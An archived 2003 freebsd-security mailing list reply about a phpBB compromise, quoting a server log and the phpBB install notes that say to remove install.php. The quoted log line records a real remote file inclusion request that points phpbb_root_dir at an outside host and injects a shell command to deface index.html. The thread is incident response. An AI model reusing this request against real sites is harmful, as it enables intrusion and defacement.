Re: hack ? - urgent - false FreeBSD alarm

From: Kevin D. Kinsey, DaleCo, S.P. (kdk_at_daleco.biz)
Date: 11/07/03

  • Next message: Marco Trentini: "Re: hack ? - urgent"
    Date: Fri, 07 Nov 2003 13:48:42 -0600
    To: Miha Nedok <mike@voyager.unix-systems.net>
    
    

    Miha Nedok wrote:

    >Hi !
    >
    >It is phpBB related. I found in logs:
    >200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET
    >/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site-
    >name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html
    >HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
    >
    >
    >
    >I just did chmod 000 `find -name 'install.php'` for a workaround.
    >
    >Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 .
    >
    >
    >
    >-Miha
    >
    >
    >
    >
    >
     From ~/phpp/docs/Install.html:

        _6. Important post-Install tasks for all installation methods_

    Once you have successfully installed phpBB 2.0.0 you *MUST* ensure you
    remove install.php, upgrade.php and update_to_FINAL.php files. Leaving
    these in place is a _very serious potential security issue_.
    Additionally you may delete the db/schemas, docs/ and contrib/
    directories if you wish.

    _______________________________________________
    freebsd-security@freebsd.org mailing list
    http://lists.freebsd.org/mailman/listinfo/freebsd-security
    To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org"

